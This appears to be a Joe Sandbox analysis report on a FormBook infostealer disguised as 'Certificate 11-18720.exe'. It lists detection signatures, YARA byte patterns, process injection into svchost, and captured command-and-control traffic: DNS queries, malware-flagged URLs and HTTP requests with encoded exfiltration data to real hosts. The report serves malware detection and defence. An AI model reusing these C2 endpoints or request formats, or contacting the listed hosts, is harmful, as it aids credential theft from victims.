Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Certificate 11-18720.exe

Overview

General Information

Sample name:Certificate 11-18720.exe
(renamed file extension from exe_ to exe)
Original sample name:Certificate 11-18720.exe_
Analysis ID:1562576
MD5:287e61624e5c839ff4b366e1969b3bce
SHA1:de64781dc1e8d8fa7c89c0e0e1952970efa6bafd
SHA256:88bd9c321e78561ad3a06e28f49adf5c09a2ad460c39c946ebffd3ec716276d3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Certificate 11-18720.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\Certificate 11-18720.exe" MD5: 287E61624E5C839FF4B366E1969B3BCE)
    • svchost.exe (PID: 6212 cmdline: "C:\Users\user\Desktop\Certificate 11-18720.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • AQvzsYASIFuMivlIGfCCjBw.exe (PID: 5956 cmdline: "C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 3448 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • AQvzsYASIFuMivlIGfCCjBw.exe (PID: 5580 cmdline: "C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3716 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Certificate 11-18720.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-18720.exe, ParentProcessId: 7112, ParentProcessName: Certificate 11-18720.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", ProcessId: 6212, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Certificate 11-18720.exe", CommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", ParentImage: C:\Users\user\Desktop\Certificate 11-18720.exe, ParentProcessId: 7112, ParentProcessName: Certificate 11-18720.exe, ProcessCommandLine: "C:\Users\user\Desktop\Certificate 11-18720.exe", ProcessId: 6212, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-25T18:11:47.039456+010020507451Malware Command and Control Activity Detected192.168.2.449736154.215.72.11080TCP
            2024-11-25T18:12:21.188999+010020507451Malware Command and Control Activity Detected192.168.2.449757116.50.37.24480TCP
            2024-11-25T18:13:44.783297+010020507451Malware Command and Control Activity Detected192.168.2.44981185.159.66.9380TCP
            2024-11-25T18:13:59.633445+010020507451Malware Command and Control Activity Detected192.168.2.44995791.195.240.9480TCP
            2024-11-25T18:14:23.456951+010020507451Malware Command and Control Activity Detected192.168.2.45001366.29.149.4680TCP
            2024-11-25T18:14:43.704610+010020507451Malware Command and Control Activity Detected192.168.2.450022195.110.124.13380TCP
            2024-11-25T18:15:15.646956+010020507451Malware Command and Control Activity Detected192.168.2.450026217.196.55.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.rssnewscast.com/fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWdAvira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWdAvira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWdAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Certificate 11-18720.exeReversingLabs: Detection: 95%
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4134816430.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4135693303.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849387117.0000000000E60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4137332421.0000000004A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4134520381.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849178523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4135588115.0000000005950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1850001201.0000000006D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Certificate 11-18720.exeJoe Sandbox ML: detected
            Source: Certificate 11-18720.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4134504423.000000000010E000.00000002.00000001.01000000.00000004.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000000.1921834218.000000000010E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Certificate 11-18720.exe, 00000000.00000003.1702615943.0000000003B30000.00000004.00001000.00020000.00000000.sdmp, Certificate 11-18720.exe, 00000000.00000003.1692848503.0000000003940000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1849589393.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849589393.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753265226.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750496212.0000000003400000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1851937705.0000000002B5A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4135936018.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1849505251.00000000029A3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000003.00000002.4134914771.000000000074E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4136427268.000000000332C000.00000004.10000000.00040000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000007.00000002.4135878729.00000000025CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2139095510.000000003449C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1849473855.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1818437081.000000000321A000.00000004.00000020.00020000.00000000.sdmp, AQvzsYASIFuMivlIGfCCjBw.exe, 00000002.00000002.4135049667.0000000000A58000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00606CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00606CA9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006060DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006060DD
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_006063F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006063F9
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0060EB60
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060F56F FindFirstFileW,FindClose,0_2_0060F56F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_0060F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0060F5FA
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00611B2F
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00611C8A
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00611F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00611F94
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_0046BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax3_2_00459480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi3_2_0045DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h3_2_02A4053E

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49757 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49811 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49957 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50013 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 217.196.55.202:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\Certificate 11-18720.exeCode function: 0_2_00614EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00614EB5
            Source: global trafficHTTP traffic detected: GET /fo8o/?7BpTBrLp=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=&3vjHf=mRWd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?7BpTBrLp=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=&3vjHf=mRWd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?7BpTBrLp=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=&3vjHf=mRWd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?7BpTBrLp=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&3vjHf=mRWd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?7BpTBrLp=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=&3vjHf=mRWd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?7BpTBrLp=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&3vjHf=mRWd HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 205Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 37 42 70 54 42 72 4c 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d Data Ascii: 7BpTBrLp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
